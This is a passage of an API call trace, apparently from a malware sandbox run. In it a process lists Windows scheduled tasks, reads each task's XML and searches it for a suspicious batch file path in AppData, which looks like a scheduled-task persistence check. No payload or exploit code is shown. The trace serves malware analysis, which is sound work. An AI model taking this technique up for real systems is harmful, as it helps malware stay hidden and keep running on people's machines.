ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295b0) returned 0x0 [0163.551] ITaskFolderCollection:get_Count (in: This=0x9295b0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.551] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.551] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.551] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.551] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.555] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.555] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.555] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="TempSignedLicenseExchange") returned 0x0 [0163.555] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-600)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-602)\r\n \\Microsoft\\Windows\\License Manager\\TempSignedLicenseExchange\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {77646A68-AD14-4D53-897D-7BE4DDE5F929}\r\n \r\n \r\n") returned 0x0 [0163.557] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-600)\r\n $(@%SystemRoot%\\system32\\TempSignedLicenseExchangeTask.dll,-602)\r\n \\Microsoft\\Windows\\License Manager\\TempSignedLicenseExchange\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {77646A68-AD14-4D53-897D-7BE4DDE5F929}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.557] IUnknown:Release (This=0x929720) returned 0x0 [0163.557] IUnknown:Release (This=0x929590) returned 0x0 [0163.557] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.559] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.560] IUnknown:Release (This=0x929590) returned 0x0 [0163.560] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.560] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.560] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.563] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0163.563] IUnknown:Release (This=0x929580) returned 0x0 [0163.563] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.567] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=1) returned 0x0 [0163.567] ITaskFolderCollection:get_Item (in: This=0x929580, index=0xce080*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce030 | out: ppFolder=0xce030*=0x929700) returned 0x0 [0163.567] ITaskFolder:GetTasks (in: This=0x929700, flags=1, ppTasks=0xcdea0 | out: ppTasks=0xcdea0*=0x9297d0) returned 0x0 [0163.570] IRegisteredTaskCollection:get_Count (in: This=0x9297d0, pCount=0xcde98 | out: pCount=0xcde98*=0) returned 0x0 [0163.570] IUnknown:Release (This=0x9297d0) returned 0x0 [0163.570] ITaskFolder:GetFolders (in: This=0x929700, flags=0, ppFolders=0xcde88 | out: ppFolders=0xcde88*=0x9297d0) returned 0x0 [0163.573] ITaskFolderCollection:get_Count (in: This=0x9297d0, pCount=0xcde94 | out: pCount=0xcde94*=0) returned 0x0 [0163.573] IUnknown:Release (This=0x9297d0) returned 0x0 [0163.573] TaskScheduler:IUnknown:Release (This=0x929700) returned 0x0 [0163.573] IUnknown:Release (This=0x929580) returned 0x0 [0163.573] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.573] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.573] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.577] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.577] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.577] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="Notifications") returned 0x0 [0163.577] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemRoot%\\system32\\LocationNotificationWindows.exe,-102)\r\n \\Microsoft\\Windows\\Location\\Notifications\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA321089541\r\n 01\r\n \r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotificationWindows.exe\r\n \r\n \r\n") returned 0x0 [0163.580] StrStrIW (lpFirst="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemRoot%\\system32\\LocationNotificationWindows.exe,-102)\r\n \\Microsoft\\Windows\\Location\\Notifications\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA321089541\r\n 01\r\n \r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotificationWindows.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.580] IUnknown:Release (This=0x929700) returned 0x0 [0163.580] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.580] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="WindowsActionDialog") returned 0x0 [0163.580] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemRoot%\\System32\\WindowsActionDialog.exe,-102)\r\n \\Microsoft\\Windows\\Location\\WindowsActionDialog\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7548BCA321089541\r\n \r\n \r\n \r\n \r\n %windir%\\System32\\WindowsActionDialog.exe\r\n \r\n \r\n") returned 0x0 [0163.582] StrStrIW (lpFirst="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemRoot%\\System32\\WindowsActionDialog.exe,-102)\r\n \\Microsoft\\Windows\\Location\\WindowsActionDialog\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7548BCA321089541\r\n \r\n \r\n \r\n \r\n %windir%\\System32\\WindowsActionDialog.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.582] IUnknown:Release (This=0x929700) returned 0x0 [0163.582] IUnknown:Release (This=0x929580) returned 0x0 [0163.582] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.585] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.585] IUnknown:Release (This=0x929580) returned 0x0 [0163.585] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.585] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x20, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.585] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.588] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.588] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.588] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="WinSAT") returned 0x0 [0163.588] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2008-02-25T19:15:00\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n \\Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT30M\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {A9A33436-678B-4C9C-A211-7CC38785E79D}\r\n \r\n \r\n") returned 0x0 [0163.594] StrStrIW (lpFirst="\r\n\r\n \r\n 2008-02-25T19:15:00\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n \\Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT30M\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {A9A33436-678B-4C9C-A211-7CC38785E79D}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.594] IUnknown:Release (This=0x929710) returned 0x0 [0163.594] IUnknown:Release (This=0x929590) returned 0x0 [0163.594] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.597] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.598] IUnknown:Release (This=0x929590) returned 0x0 [0163.598] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.598] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x21, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.598] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.600] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0163.600] IUnknown:Release (This=0x929590) returned 0x0 [0163.600] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.604] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=1) returned 0x0 [0163.604] ITaskFolderCollection:get_Item (in: This=0x929590, index=0xce080*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce030 | out: ppFolder=0xce030*=0x929720) returned 0x0 [0163.604] ITaskFolder:GetTasks (in: This=0x929720, flags=1, ppTasks=0xcdea0 | out: ppTasks=0xcdea0*=0x929800) returned 0x0 [0163.607] IRegisteredTaskCollection:get_Count (in: This=0x929800, pCount=0xcde98 | out: pCount=0xcde98*=1) returned 0x0 [0163.607] IRegisteredTaskCollection:get_Item (in: This=0x929800, index=0xcdee8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xcde88 | out: ppRegisteredTask=0xcde88*=0x9299a0) returned 0x0 [0163.607] IRegisteredTask:get_Name (in: This=0x9299a0, pName=0xcdea8 | out: pName=0xcdea8*="Logon") returned 0x0 [0163.607] IRegisteredTask:get_Xml (in: This=0x9299a0, pXml=0xcde80 | out: pXml=0xcde80*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemRoot%\\system32\\ProvTool.exe,-101)\r\n $(@%systemRoot%\\system32\\ProvTool.exe,-102)\r\n \\Microsoft\\Windows\\Management\\Provisioning\\Logon\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n StopExisting\r\n 9\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\ProvTool.exe\r\n /turn 5\r\n \r\n \r\n") returned 0x0 [0163.609] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemRoot%\\system32\\ProvTool.exe,-101)\r\n $(@%systemRoot%\\system32\\ProvTool.exe,-102)\r\n \\Microsoft\\Windows\\Management\\Provisioning\\Logon\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n StopExisting\r\n 9\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\ProvTool.exe\r\n /turn 5\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.609] IUnknown:Release (This=0x9299a0) returned 0x0 [0163.609] IUnknown:Release (This=0x929800) returned 0x0 [0163.609] ITaskFolder:GetFolders (in: This=0x929720, flags=0, ppFolders=0xcde88 | out: ppFolders=0xcde88*=0x929800) returned 0x0 [0163.612] ITaskFolderCollection:get_Count (in: This=0x929800, pCount=0xcde94 | out: pCount=0xcde94*=0) returned 0x0 [0163.612] IUnknown:Release (This=0x929800) returned 0x0 [0163.612] TaskScheduler:IUnknown:Release (This=0x929720) returned 0x0 [0163.612] IUnknown:Release (This=0x929590) returned 0x0 [0163.612] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.612] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.612] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.617] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.617] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.617] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="MapsToastTask") returned 0x0 [0163.617] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2014-11-05T00:00:00\r\n D:(A;;0x111FFFFF;;;SY)(A;;0x111FFFFF;;;BA)(A;;0x111FFFFF;;;S-1-5-80-3028837079-3186095147-955107200-3701964851-1150726376)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\mapstoasttask.dll,-600)\r\n $(@%SystemRoot%\\system32\\mapstoasttask.dll,-602)\r\n \\Microsoft\\Windows\\Maps\\MapsToastTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5S\r\n true\r\n Queue\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {9885AEF2-BD9F-41E0-B15E-B3141395E803}\r\n \r\n \r\n \r\n") returned 0x0 [0163.619] StrStrIW (lpFirst="\r\n\r\n \r\n 2014-11-05T00:00:00\r\n D:(A;;0x111FFFFF;;;SY)(A;;0x111FFFFF;;;BA)(A;;0x111FFFFF;;;S-1-5-80-3028837079-3186095147-955107200-3701964851-1150726376)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\mapstoasttask.dll,-600)\r\n $(@%SystemRoot%\\system32\\mapstoasttask.dll,-602)\r\n \\Microsoft\\Windows\\Maps\\MapsToastTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5S\r\n true\r\n Queue\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {9885AEF2-BD9F-41E0-B15E-B3141395E803}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.620] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.620] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.620] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="MapsUpdateTask") returned 0x0 [0163.620] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2014-11-05T00:00:00\r\n D:(A;;0x111FFFFF;;;SY)(A;;0x111FFFFF;;;BA)(A;;0x111FFFFF;;;S-1-5-80-3028837079-3186095147-955107200-3701964851-1150726376)(A;;FRFX;;;NS)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\mapsupdatetask.dll,-600)\r\n $(@%SystemRoot%\\system32\\mapsupdatetask.dll,-602)\r\n \\Microsoft\\Windows\\Maps\\MapsUpdateTask\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT40S\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2014-10-21T00:00:00\r\n \r\n P1D\r\n \r\n PT2H\r\n \r\n \r\n \r\n \r\n {B9033E87-33CF-4D77-BC9B-895AFBBA72E4}\r\n \r\n \r\n") returned 0x0 [0163.623] StrStrIW (lpFirst="\r\n\r\n \r\n 2014-11-05T00:00:00\r\n D:(A;;0x111FFFFF;;;SY)(A;;0x111FFFFF;;;BA)(A;;0x111FFFFF;;;S-1-5-80-3028837079-3186095147-955107200-3701964851-1150726376)(A;;FRFX;;;NS)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\mapsupdatetask.dll,-600)\r\n $(@%SystemRoot%\\system32\\mapsupdatetask.dll,-602)\r\n \\Microsoft\\Windows\\Maps\\MapsUpdateTask\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT40S\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2014-10-21T00:00:00\r\n \r\n P1D\r\n \r\n PT2H\r\n \r\n \r\n \r\n \r\n {B9033E87-33CF-4D77-BC9B-895AFBBA72E4}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.624] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.624] IUnknown:Release (This=0x929580) returned 0x0 [0163.624] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.627] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.627] IUnknown:Release (This=0x929580) returned 0x0 [0163.627] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.627] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x23, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.627] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.630] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.630] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.631] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="ProcessMemoryDiagnosticEvents") returned 0x0 [0163.631] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-601)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-600)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-603)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\ProcessMemoryDiagnosticEvents\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WER-SystemErrorReporting'] and (EventID=1000 or EventID=1001 or EventID=1006)]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Application Error'] and EventID=1000]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n {8168E74A-B39F-46D8-ADCD-7BED477B80A3}\r\n \r\n \r\n \r\n") returned 0x0 [0163.634] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-601)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-600)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-603)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\ProcessMemoryDiagnosticEvents\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WER-SystemErrorReporting'] and (EventID=1000 or EventID=1001 or EventID=1006)]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Application Error'] and EventID=1000]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n {8168E74A-B39F-46D8-ADCD-7BED477B80A3}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.635] IUnknown:Release (This=0x929720) returned 0x0 [0163.635] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.635] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="RunFullMemoryDiagnostic") returned 0x0 [0163.635] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-601)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-600)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-602)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\RunFullMemoryDiagnostic\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT2H\r\n 